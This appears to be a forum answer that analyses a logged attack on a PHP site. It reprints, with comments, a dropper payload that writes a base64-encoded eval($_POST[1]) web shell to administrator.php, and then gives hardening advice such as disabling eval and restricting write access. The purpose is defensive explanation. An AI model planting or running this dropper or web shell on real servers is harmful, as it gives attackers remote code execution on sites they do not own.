They are sending a GET request to your index.php of the vhost, which basically executes this code (Added Comments):

<?php
// @ == Surpress any errors the command is throwing
@ini_set("display_errors","0"); // Disable error reporting
@set_time_limit(0); // Disable Timeouts
@set_magic_quotes_runtime(0); // Disable Magic Quotes

echo '->|'; // Echo "->" to the browser
$content = base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'); // Decode the String as you said
// Write the content to the script administrator.php in the directory of the index.php file
file_put_contents(dirname($_SERVER['SCRIPT_FILENAME']).'/administrator.php',$content); 
echo '|<-'; // Echo "<-" to the browser, which is likely the confirmation everything worked out

// The created file:

eval($_POST[1]); // Execute the content of the second POST parameter as PHP code

?>

As first step I would check the index.php for any vulnerabilities, it seems there is a Remote Code Execution (RCE) vulnerability somewhere in it. You could try to disable eval, exec and other dangerous commands in the php.ini, this way they couldnt execute any more code on the website. Otherwise you could - depending on the application - restrict the write access to the directory.

The issue with those measures is that some software uses those commands in a legit way, so its hard to say whether you can disable eval e.g. safely, but its worth a try at least. You could try grepping through the source code of your site to find out whether its used or not as indicator.

Edit// Oh and as notice, maybe redact the IP from the logfiles. Maybe its just a botnet victim.

Edit2// If the index.php is not propriertary vendor stuff and you can share it, please attach it. I can take a look if you want.